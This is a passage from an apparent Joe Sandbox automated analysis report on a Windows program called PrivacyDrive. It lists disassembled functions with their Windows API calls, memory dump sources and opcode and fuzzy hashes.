                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$CreateThread
                                • String ID:
                                • API String ID: 1266159367-0
                                • Opcode ID: d823e280d65025859753554790f6da093569cbb5b82ebdc6321a09162cd8c4bd
                                • Instruction ID: 8cc3b0a51fcd65b771b9e909ff629f6c459418f429e36cbbda7ef878de64432e
                                • Opcode Fuzzy Hash: d823e280d65025859753554790f6da093569cbb5b82ebdc6321a09162cd8c4bd
                                • Instruction Fuzzy Hash: F7018F31780305BBE7605B59DC0AF9ABBA9EB89B12F200156F604AB3D0DBF578508B94
                                Function 0040E8B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSection.KERNEL32(005BE320), ref: 0040E8EB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalInitializeSection
                                • String ID: H[$H[$H[
                                • API String ID: 32694325-1837155954
                                • Opcode ID: c7aebc6e4b3a83198371447792bfd2ff78bf29b774be86d5e2ad15fedbbeb864
                                • Instruction ID: b9855ffc058c84e9ca46d1141f946c03c33deff916cfef822f720d3513f22b01
                                • Opcode Fuzzy Hash: c7aebc6e4b3a83198371447792bfd2ff78bf29b774be86d5e2ad15fedbbeb864
                                • Instruction Fuzzy Hash: C721E4B0904384DAE741CF54E94A7EDBFF0BB11718F6C4A58E4116B390C3B93A4CAB91
                                Function 00409630 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(?), ref: 00409646
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 0040965F
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00409669
                                • LeaveCriticalSection.KERNEL32(?), ref: 004096C6
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalPerformanceQuerySection$CounterEnterFrequencyLeave
                                • String ID:
                                • API String ID: 95068880-0
                                • Opcode ID: c1abe6072d92c916122f8629979ac2178d974c793c7b23b83189686a9ff3147b
                                • Instruction ID: 0b67c4b35b9f983c7b10185d109a282aad021f786903e7976e4891913ca14e31
                                • Opcode Fuzzy Hash: c1abe6072d92c916122f8629979ac2178d974c793c7b23b83189686a9ff3147b
                                • Instruction Fuzzy Hash: BD116D36D00F0D9BC712EFB4C8654AFF779BF5A381B108716E80672621EB30A586DB90
                                Function 00431770 Relevance: 6.0, APIs: 4, Instructions: 46synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,7563D392,00000000,00000000,?,0053E5DF,000000FF,?,004772AB,?,?,004771AD,00000001), ref: 004317B6
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,004772AB,?,?,004771AD,00000001), ref: 004317C1
                                • DeleteCriticalSection.KERNEL32(00000088,7563D392,00000000,00000000,?,0053E5DF,000000FF,?,004772AB,?,?,004771AD,00000001), ref: 004317D2
                                • DeleteCriticalSection.KERNEL32(00000038,?,004772AB,?,?,004771AD,00000001), ref: 004317F6
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalDeleteSection$EventObjectSingleWait
                                • String ID:
                                • API String ID: 3461137121-0
                                • Opcode ID: 6748f4d44dc4d50006911c3472061da65a69049d66e22d7dc00ca2eaa64093fa
                                • Instruction ID: 312aabd15dd19868a472a8003377af609e2d142412e2ce9af3f6ac4be44942b1
                                • Opcode Fuzzy Hash: 6748f4d44dc4d50006911c3472061da65a69049d66e22d7dc00ca2eaa64093fa
                                • Instruction Fuzzy Hash: A3114F75804704DFD710CFA4D808B9ABBF8FB09724F10475EE466936D0DBB56508DB80
                                Function 00444750 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • GetParent.USER32(00000000), ref: 00444787
                                • SetWindowPos.USER32(00000000), ref: 0044478E
                                • GetParent.USER32(00000000), ref: 004447A8
                                • SetWindowPos.USER32(00000000), ref: 004447AF
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ParentWindow
                                • String ID:
                                • API String ID: 3530579756-0
                                • Opcode ID: 42f94c353c819ef089b1f4b96bb8e289d71d1c5a22e3e814b417eef4dec2cd4d
                                • Instruction ID: 689c1b5557c08a502fa67d8a854d673dc3e0cf94cfd9766299e1bbfbc7d27fe1
                                • Opcode Fuzzy Hash: 42f94c353c819ef089b1f4b96bb8e289d71d1c5a22e3e814b417eef4dec2cd4d
                                • Instruction Fuzzy Hash: A5F03A75340300ABEB50ABA8DCCDF1637A8BB19B12F404465F205DF2D2C6A9E8849B20
                                Function 00434750 Relevance: 6.0, APIs: 4, Instructions: 39windowsynchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(00000000,?,00000000,00000000), ref: 0043477E
                                • PostMessageW.USER32(00000000,?,00000000,00000000), ref: 00434790
                                • PostMessageW.USER32(00000000,?,00000000,00000000), ref: 004347A2
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00477265,7563D392,?,00000000,?,0053EB6B,000000FF,?,0047716E,00000001), ref: 004347AC
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$ObjectSingleWait
                                • String ID:
                                • API String ID: 3891836223-0
                                • Opcode ID: e364dde6b3e4b5aa2088c1bdc537ad6c38bdc358620cae1467779c4b3705d138
                                • Instruction ID: 4fee9673e0430d2affbe9e6b6737d69ae55853fce93c2e293958b55722791483
                                • Opcode Fuzzy Hash: e364dde6b3e4b5aa2088c1bdc537ad6c38bdc358620cae1467779c4b3705d138
                                • Instruction Fuzzy Hash: 28013C35240314ABDF509F95CC89FC67B64EB08725F1441A1BA089F1E6CBF0A884CBA0
                                Function 004D4850 Relevance: 6.0, APIs: 4, Instructions: 35windowCOMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(?,?,?,00489CEF,-00000005), ref: 004D4869
                                • PostMessageW.USER32(?,00000112,0000F120,00000000), ref: 004D4882
                                • PostMessageW.USER32(?,00000112,0000F020,00000000), ref: 004D489B
                                • PostMessageW.USER32(?,00000112,0000F030,00000000), ref: 004D48B4
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$ShowWindow
                                • String ID:
                                • API String ID: 928190103-0
                                • Opcode ID: 19b0d7360b4a26854c8cae59c0cabf60fa56f4d3ed5e3427083f7e25d17a63aa
                                • Instruction ID: e34f6ce598d2351c28fb393475d967a754460403ee69147af5dd5b574621f4b5
                                • Opcode Fuzzy Hash: 19b0d7360b4a26854c8cae59c0cabf60fa56f4d3ed5e3427083f7e25d17a63aa
                                • Instruction Fuzzy Hash: 6FF0BE72180308E7E6241B90FC1AFA97629DB28B15F208423F304A85F283B29839F608
                                Function 004C24A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 336COMMON
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                  • Part of subcall function 00436AE0: WideCharToMultiByte.KERNEL32(76ECFFB0,00000000,?,000000FF,?,?,00000000,00000000,?,?,004C27B9,?,00000003,?,00583B28,00000000), ref: 00436B01
                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,?,00571F54,00000000,?,0056C344,7563D392,7563D392,76ECFFB0), ref: 004C2822
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide
                                • String ID: v
                                • API String ID: 626452242-3261393531
                                • Opcode ID: aa1059905902807c932c4b742497ec450df12eddd552b9279fa6f7977f568d2d
                                • Instruction ID: bc7e3dfac5ddef5d83bb0b5f5abfd24ce00b016c9a10128345e9228d8def854f
                                • Opcode Fuzzy Hash: aa1059905902807c932c4b742497ec450df12eddd552b9279fa6f7977f568d2d
                                • Instruction Fuzzy Hash: 88C1E379A00215DBDF60DFA8C945B9FBBB4BF48714F24022ED801B7281D7F49A05CBA4
                                Function 004A20F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412230: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00412288
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,00000007,7563D392,EFFFFFFF,00000000), ref: 004A2187
                                  • Part of subcall function 004A2510: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A232A,00403019), ref: 004A2520
                                  • Part of subcall function 004A2510: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A2538
                                  • Part of subcall function 004A2510: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,BASE_DIALOG), ref: 004A2565
                                  • Part of subcall function 004A2510: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A2577
                                  • Part of subcall function 004A2510: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,00000000,BASE_DIALOG), ref: 004A25A4
                                  • Part of subcall function 004A2510: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004A25B6
                                • __CxxThrowException@8.LIBCMT ref: 004A2357
                                  • Part of subcall function 004A27F0: TryEnterCriticalSection.KERNEL32(005BDCCC,?,004A2335,00403019), ref: 004A27F8
                                  • Part of subcall function 004A27F0: LeaveCriticalSection.KERNEL32(005BDCCC,Dialog,MESSAGE_BOX), ref: 004A281F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$Concurrency::details::_Concurrent_queue_base_v4::_CreateException@8FormatGdipInternal_throw_exceptionStringThrow
                                • String ID: !@
                                • API String ID: 1383318732-1028639617
                                • Opcode ID: d3fdda6977b5add1d8449eff889fc7f63bc45f5e4cbb85ecbf298274748bdbb1
                                • Instruction ID: 52ee6c17c7c72821ccf08dbd61eef8e3dc6c6fb30ec650336ffc7aa70918cd5f
                                • Opcode Fuzzy Hash: d3fdda6977b5add1d8449eff889fc7f63bc45f5e4cbb85ecbf298274748bdbb1
                                • Instruction Fuzzy Hash: 4E81F7B0905249DEDB05CF68C51879ABFF4FF16318F24819DD408AF392D3BA9A09DB91
                                Function 00402460 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00403950: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0040398C
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                  • Part of subcall function 004A72E0: DeviceIoControl.KERNEL32(?,07770C40,00000000,00000285,00000000,00000285,?,00000000), ref: 004A736D
                                  • Part of subcall function 004A72E0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A7390
                                • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000002), ref: 004025FC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek$Concurrency::details::_Concurrent_queue_base_v4::_ControlDeviceInternal_throw_exception_malloc
                                • String ID: list<T> too long$[
                                • API String ID: 198154210-1700255231
                                • Opcode ID: eb04e13b04f29042d0268d7e3f1825a3904ed4797e65bd5829df465d64a30d9a
                                • Instruction ID: 5bfe017c1d075ea3c3b1c90e75c0c42364a54a30971ee20f6fd7985f3f173334
                                • Opcode Fuzzy Hash: eb04e13b04f29042d0268d7e3f1825a3904ed4797e65bd5829df465d64a30d9a
                                • Instruction Fuzzy Hash: 8651C574900208ABDB14CB64CA5ABEEBBB5FF44314F24053AE511B73C0D7B96A44CB69
                                Function 004751C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNEL32(?,?,00000040,00000000,7563D392,?,?,00000000,?,?,005453B6,000000FF,?,0044860E,?,?), ref: 00475237
                                • VirtualProtect.KERNEL32(?,?,00583BB8,00000000), ref: 00475371
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: aes
                                • API String ID: 544645111-1741866849
                                • Opcode ID: a26ecac06fc112e09cba3384c61047435bde0186e7887d07941b142ca819a9dc
                                • Instruction ID: c7f102ab8efc31625e05e908843ee0437d29b426c9a67cbfe1a089473b48b124
                                • Opcode Fuzzy Hash: a26ecac06fc112e09cba3384c61047435bde0186e7887d07941b142ca819a9dc
                                • Instruction Fuzzy Hash: 5251F7711087416FE320DB25CC4AFAFBBE8AF88754F44051EFA48962D1EBB4E904C766
                                Function 0040B910 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: expected >
                                • API String ID: 0-2131776098
                                • Opcode ID: 860c36a5622d6b1313a498e033aca5d6bed8216c118a33f16c4e8ce3f304ed1d
                                • Instruction ID: 11389b22c623f2744d9f42ce52ef85c0baad429e2c7341582c302e08c145dbae
                                • Opcode Fuzzy Hash: 860c36a5622d6b1313a498e033aca5d6bed8216c118a33f16c4e8ce3f304ed1d
                                • Instruction Fuzzy Hash: 49519CB0A042559ECB20CF5AC444ABABFF4FF09714F1445AAE494AB382D3749945CBE8
                                Function 0040C700 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                • Opcode ID: 3469917551e973ec293afed111e285f1fc0d4b7dff7816ac84445a26b7dcea9f
                                • Instruction ID: e9a7fcd289439b3e7619a7d62964bdc1ae14986dfd13999ab9b257cbe0806416
                                • Opcode Fuzzy Hash: 3469917551e973ec293afed111e285f1fc0d4b7dff7816ac84445a26b7dcea9f
                                • Instruction Fuzzy Hash: 82319F32300215CBD7249F5DE8C0A6AFBA5EB91B61F104A3FE5459B281D7B598408BA9
                                Function 0043A580 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0043A640
                                • _memmove.LIBCMT ref: 0043A656
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
